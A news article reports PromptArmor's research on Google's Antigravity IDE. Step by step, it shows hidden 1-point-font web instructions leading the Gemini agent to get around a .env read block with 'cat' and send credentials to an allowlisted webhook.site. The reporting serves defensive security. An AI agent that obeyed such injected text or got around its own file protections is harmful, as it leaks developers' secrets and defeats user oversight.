Barely a week after Google launched Antigravity , its “agent-first” Integrated Development Environment (IDE), security researchers have demonstrated how the tool’s autonomy can be weaponized.
A new report reveals that indirect prompt injection allows attackers to steal credentials by manipulating the very agents designed to boost productivity.
PromptArmor, a security research firm, found that the vulnerability exploits Antigravity’s default settings. By hiding instructions in 1-point font on a webpage, attackers can force the AI to bypass file protections using system commands and exfiltrate secrets to a public logging site.
Despite the severity, Google classifies these behaviors as “intended,” leaving enterprise codebases exposed. These findings highlight a critical gap between the marketing of “reasoning” models and the reality of their default security posture.
Promo
The ‘Lethal Trifecta’: Anatomy of the Attack
Exploitation begins with a “poisoned” web source, such as a third-party integration guide containing malicious instructions. Attackers hide the prompt injection in 1-point font in the source, rendering it invisible to human developers but legible to the Gemini model.
Once ingested, the injected prompt instructs the agent to harvest sensitive credentials and code snippets from the user’s local environment. Gemini correctly identifies that the target .env file is listed in .gitignore and initially refuses access based on standard safety protocols.
However, the agent’s autonomy allows it to override this restriction. Following the attacker’s “reasoning,” it circumvents the read restriction by executing the system cat command in the terminal to dump file contents to standard output. The PromptArmor report describes the mechanism:
“Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file reading capability that has been blocked.”
Such a bypass demonstrates how easily standard guardrails can be dismantled by an agent with system-level access. As the security analysis notes, “Gemini bypasses its own setting to get access and subsequently exfiltrate that data.”
After accessing the credentials, the agent encodes the stolen data into a URL string.
Finally, the attack involves sending the data to webhook.site, a public request logging service. Exfiltration becomes possible only because webhook.site is inexplicably included in Antigravity’s default Browser URL Allowlist. The researchers highlight this configuration flaw:
“However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site allows anyone to create a URL where they can monitor requests to the URL.”
Inclusion of such a domain in a default allowlist effectively nullifies network egress protections, allowing data to leave the local environment without triggering alerts.
Policy vs. Reality: Google’s ‘Intended Behavior’ Stance
PromptArmor deviated from the standard 90-day responsible disclosure window for these findings. Justifying this decision, the firm cited Google’s prior classification of similar reports as “intended behavior” rather than security flaws.
According to the researchers, “Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.”
A fundamental disagreement exists between security professionals and Google regarding the acceptable risk profile of agentic tools.
Official documentation supports PromptArmor’s assessment of Google’s policy. Google’s Bug Hunters platform explicitly lists “Antigravity agent has access to files” and “permission to execute commands” as invalid report types. The official policy states:
“Antigravity agent has access to files” […] “Antigravity agent has permission to execute commands”
Such a “wontfix” stance clashes with the narrative surrounding the Antigravity IDE launch, where executives positioned Gemini 3 Pro as a sophisticated reasoning engine capable of complex problem-solving.
Secondary findings from other researchers corroborate the risks. Security researcher ‘wunderwuzzi23’ (Embrace The Red) identified remote command execution risks that extend beyond the browser-based attack vector.
PromptArmor also noted that the vulnerabilities are not limited to specific configurations. Stating that the vulnerabilities are not limited to specific configurations, the team noted “We found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.”
The Agentic Dilemma: Productivity vs. Security
Industry leaders are struggling to balance the friction-free promise of “agent-first” development with the need for rigid security boundaries. Antigravity ships with “Agent Decides” as the default review policy, effectively removing the human from the loop for most actions.
Compounding the issue is a “Terminal Command Auto Execution” policy, which allows the agent to run system commands like cat or curl without user confirmation. These defaults prioritize speed over safety, creating an environment ripe for exploitation.
The security experts describe this as a “Lethal Trifecta” of risk factors. Vulnerabilities exist because the agent has simultaneous access to untrusted input (the web), private data (the codebase), and external communication (the internet).
The lethal trifecta concept highlights that when all three conditions are met, data exfiltration becomes almost inevitable without strict isolation.
While tools like Cursor and Windsurf face similar theoretical risks, Antigravity’s permissive default allowlist makes it uniquely susceptible to immediate exfiltration. Other platforms typically require explicit user approval for network requests to new domains.
Mitigation strategies proposed by experts suggest that “YOLO-mode” agents that disable all safety checks must be isolated in firewalled Virtual Machines (VMs) rather than running directly on the host OS.
Without such measures, these findings may chill enterprise adoption of autonomous coding tools until vendors implement strict network egress filtering and sandboxing by default.